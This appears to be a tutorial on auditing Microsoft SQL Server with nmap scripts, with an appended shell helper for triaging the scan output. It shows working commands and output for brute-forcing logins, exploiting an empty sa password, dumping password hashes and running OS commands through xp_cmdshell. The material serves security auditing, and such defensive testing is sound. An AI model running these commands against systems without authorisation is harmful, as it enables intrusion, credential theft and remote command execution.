Auditing MS SQL Server security with nmap
Nmap ships with a number of useful NSE scripts for checking the security of a Microsoft SQL Server database. In this note I will show how you can audit your SQL Server with them.
Check the sa account for an empty password
ms-sql-empty-password
Attempts to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.
Example:
nmap -p 1433 --script ms-sql-empty-password 192.200.11.11
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-12 12:41 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00064s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-empty-password:
| [192.200.11.11:1433]
|_ sa:<empty> => Login Success
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 17.5
If only port 445 (microsoft-ds, SMB) is open, the mssql library can still reach the instance over named pipes and discover instances through the SQL Server Browser service; mssql.instance-all tells the script to test every instance it discovers, and the result is then reported under "Host script results":
nmap -p 445 --script ms-sql-empty-password --script-args mssql.instance-all 192.200.11.11
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-12 12:44 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00059s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)
Host script results:
| ms-sql-empty-password:
| [192.200.11.11:1433]
Brute-force attacks
ms-sql-brute tries username/password pairs from nmap's default lists (override them with the userdb and passdb script arguments). Against this host it ran for over two minutes and found nothing:
nmap -p 1433 --script ms-sql-brute 192.200.11.11
Host is up, received arp-response (0.00064s latency).
Scanned at 2016-06-12 12:20:41 EDT for 157s
PORT STATE SERVICE REASON
1433/tcp open ms-sql-s syn-ack ttl 128
| ms-sql-brute:
| [192.200.11.11:1433]
|_ No credentials found
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)
Final times for host: srtt: 636 rttvar: 3138 to: 100000
Dumping the password hashes of an MS SQL server
ms-sql-dump-hashes needs a login with sufficient privileges (sysadmin). Chaining it after ms-sql-empty-password works because the mssql library keeps the credentials found by ms-sql-empty-password (and ms-sql-brute) and reuses them in later scripts, so if sa has an empty password the hashes come out without passing any credentials. Hashes starting with 0x0200 are the salted SHA-512 format used by SQL Server 2012 and later and can be cracked offline.
nmap -p 1433 --script ms-sql-empty-password,ms-sql-dump-hashes 192.200.11.11
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-19 05:03 EDT
Nmap scan report for 192.200.11.11
Host is up (0.016s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-dump-hashes:
| [192.200.11.11:1433]
| sa:0x0200EC357FC5FA85256C4BC37667845B81E84C0F3CA9E7AD2BC7FB94FB698E5243FC5112C2B240884C44E71FD45195BB60B4AAF63D24B909C5945285793D0605E4D09E886849
| ##MS_PolicyTsqlExecutionLogin##:0x0200251457811E7CB37A8C9746EC742325673A60D16B98DF182FCF7E4410A2FB1B03C36B2E60A68BB269C7D47B3C43F6CB485365CF5D171A48171B6DA6DB74CDEA40759E9DFC
| ##MS_PolicyEventProcessingLogin##:0x0200F8A9BBBADB33E242C190EE82D15BB47564F46C5BF7B29B0124F32DCFF96837F9F243BD054F0A0D2B8D5C4D95F885B30EAA47F94F7FBBD3EA613DF64F05E14659742EB868
Getting information
ms-sql-info attempts to determine configuration and version information for Microsoft SQL Server instances, from the TCP listener and, if UDP 1434 is scanned as well, from the SQL Server Browser service.
No credentials are required.
nmap -p 1433-1900 --script ms-sql-info 192.200.11.11
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-12 11:55 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00096s latency).
Not shown: 467 closed ports
PORT STATE SERVICE
1433/tcp open ms-sql-s
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)
Host script results:
| ms-sql-info:
| 192.200.11.11:1433:
| Version:
| number: 11.00.3128.00
| Post-SP patches applied: true
| Service pack level: SP1
| Product: Microsoft SQL Server 2012
| name: Microsoft SQL Server 2012 SP1+
|_ TCP port: 1433
Running a command shell on MS SQL servers
xp_cmdshell is disabled by default since SQL Server 2005, but a sysadmin login such as sa can re-enable it with sp_configure, so an empty sa password means OS command execution as the SQL Server service account. To run the dir command on the Windows server when the sa password is empty:
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args 'mssql.username=sa,mssql.password="",ms-sql-xp-cmdshell.cmd="dir"' 192.200.11.11
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-19 05:38 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00046s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-xp-cmdshell:
| [192.200.11.11:1433]
| Command: dir
| output
| ======
| Volume in drive C has no label.
| Volume Serial Number is 1E1E-6DAB
| Null
| Directory of C:\Windows\system32
| Null
| 19/06/2016 01:51 <DIR> .
| 19/06/2016 01:51 <DIR> ..
| 30/09/2013 16:44 <DIR> 0409
| 02/01/2016 12:33 <DIR> 1033
| 18/06/2013 07:48 160 @OpenWithToastLogo.png
| 18/06/2013 08:04 120 @TileEmpty1x1Image.png
| 22/08/2013 03:39 3,812,352 accessibilitycpl.dll
| 22/08/2013 04:45 39,424 ACCTRES.dll
Running a SQL query
ms-sql-query runs a query against Microsoft SQL Server (ms-sql). The example below dumps the syslogins compatibility view, password hash column included; on SQL Server 2005 and later, sys.sql_logins and sys.server_principals are the current views for the same information.
nmap -p 1433 --script ms-sql-query --script-args 'mssql.username=sa,mssql.password="",ms-sql-query.query="SELECT * FROM syslogins"' 192.200.11.11
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-19 06:02 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00060s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-query:
| [192.200.11.11:1433]
| Query: SELECT * FROM syslogins
| sid status createdate updatedate accdate totcpu totio spacelimit timelimit resultlimit name dbname password language denylogin hasaccess isntname isntgroup isntuser sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin loginname
| === ====== ========== ========== ======= ====== ===== ========== ========= =========== ==== ====== ======== ======== ========= ========= ======== ========= ======== ======== ============= =========== ========== ============ ========= ========= ========= =========
| 0x01 9 Apr 08, 2003 14:10:35 Jun 12, 2016 14:50:31 Apr 08, 2003 14:10:35 0 0 0 00sa master \x02\xEC\x7F\xFA%Kv\x84\x81L<\xE7+\xFB\xFB\x8ECQ\xC2@L\xE7\xD4\x95`\xAA=\xB9\xC5Ry\x06\xE4\x9Eh us_english0 1 0 0 0 1 0 0 0 0 0 0 0 sa
| 0x0106000000000009010000005FB6DAC7F7DB546D706711B128B5063888B01770 10 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 0 0 0 0 0 ##MS_SQLResourceSigningCertificate## master Null Null 0 0 0 0 0 0 0 0 0 0 0 0 0##MS_SQLResourceSigningCertificate##
| 0x010600000000000901000000A0B7FCD6F6D5FA771521910A3B71A750568D6275 10 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 0 0 0 0 0 ##MS_SQLReplicationSigningCertificate## master Null Null 0 0 0 0 0 0 0 0 0 0 0 0 0##MS_SQLReplicationSigningCertificate##
| 0x010600000000000901000000C2FB1C6E4485BB1056EBC85FD2CC2AD081390316 10 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 0 0 0 0 0 ##MS_SQLAuthenticatorCertificate## master Null Null 0 0 0 0 0 0 0 0 0 0 0 0 0##MS_SQLAuthenticatorCertificate##
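Putting the sections above together: the following shell example is added here and is not part of the original note. It builds the nmap command used above with correctly quoted --script-args (the empty sa password as an explicit empty string, the xp_cmdshell command quoted because it may contain spaces), and it triages nmap normal output (-oN) for the findings the ms-sql-empty-password, ms-sql-xp-cmdshell, ms-sql-dump-hashes and ms-sql-info scripts print. The function names, the output file naming and the sample output are assumptions; host 192.200.11.12 in the sample is a made-up hardened instance, not a host from the note.

```sh
#!/bin/sh
# Added example, not from the original note: build the nmap audit command with
# correctly quoted --script-args, and triage saved nmap normal output (-oN).

# Print the nmap command for one target. The --script-args value is wrapped in
# single quotes so the shell leaves the inner double quotes for nmap's own
# argument parser; the empty sa password is passed as an explicit empty string.
# $1 = target, $2 = OS command for ms-sql-xp-cmdshell (must not contain a ").
# Function name and -oN file naming are assumptions made for this example.
mssql_audit_cmd() {
    printf "nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-dump-hashes,ms-sql-xp-cmdshell --script-args 'mssql.username=sa,mssql.password=\"\",ms-sql-xp-cmdshell.cmd=\"%s\"' -oN mssql_%s.nmap %s\n" "$2" "$1" "$1"
}

# Read nmap normal output on stdin and print one finding per line as
# "<host>: <LEVEL> <message>". The current host is taken from the
# "Nmap scan report for" header, so multi-host scans are handled.
mssql_triage() {
    awk '
        /^Nmap scan report for /            { host = $5 }
        /=> Login Success/                  { print host ": FAIL sa accepted an empty password" }
        /^[|] ms-sql-xp-cmdshell:/          { print host ": FAIL xp_cmdshell executed an OS command" }
        /^[|] ms-sql-dump-hashes:/          { print host ": FAIL login password hashes were dumped" }
        /^[|][ ]*Version:/                  { in_version = 1 }
        in_version && /^[|][ ]*name: /      { sub(/^[|][ ]*name: /, ""); print host ": INFO " $0; in_version = 0 }
    '
}

# Constructed sample of -oN output. Host .11 reproduces the results shown in
# this note; host .12 is a made-up hardened instance that gave the
# credential scripts nothing to report.
SAMPLE_NMAP_OUTPUT='Nmap scan report for 192.200.11.11
Host is up (0.00064s latency).
PORT     STATE SERVICE
1433/tcp open  ms-sql-s
| ms-sql-empty-password:
|   [192.200.11.11:1433]
|_    sa:<empty> => Login Success
| ms-sql-xp-cmdshell:
|   [192.200.11.11:1433]
|     Command: whoami
|     output
|     ======
|_    nt service\mssqlserver
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)

Host script results:
| ms-sql-info:
|   192.200.11.11:1433:
|     Version:
|       number: 11.00.3128.00
|       Post-SP patches applied: true
|       Service pack level: SP1
|       Product: Microsoft SQL Server 2012
|       name: Microsoft SQL Server 2012 SP1+
|_    TCP port: 1433

Nmap scan report for 192.200.11.12
Host is up (0.00071s latency).
PORT     STATE SERVICE
1433/tcp open  ms-sql-s

Host script results:
| ms-sql-info:
|   192.200.11.12:1433:
|     Version:
|       number: 13.00.1601.05
|       Product: Microsoft SQL Server 2016
|       name: Microsoft SQL Server 2016 RTM
|_    TCP port: 1433
'

# Demo: print the command for the host in this note, then triage the sample.
mssql_audit_cmd 192.200.11.11 whoami
printf '%s' "$SAMPLE_NMAP_OUTPUT" | mssql_triage
```

In a real run you would save the scan with -oN and feed that file to mssql_triage instead of the embedded sample; any FAIL line for a host means the sa account should get a strong password (or be disabled) and xp_cmdshell should be turned back off with sp_configure.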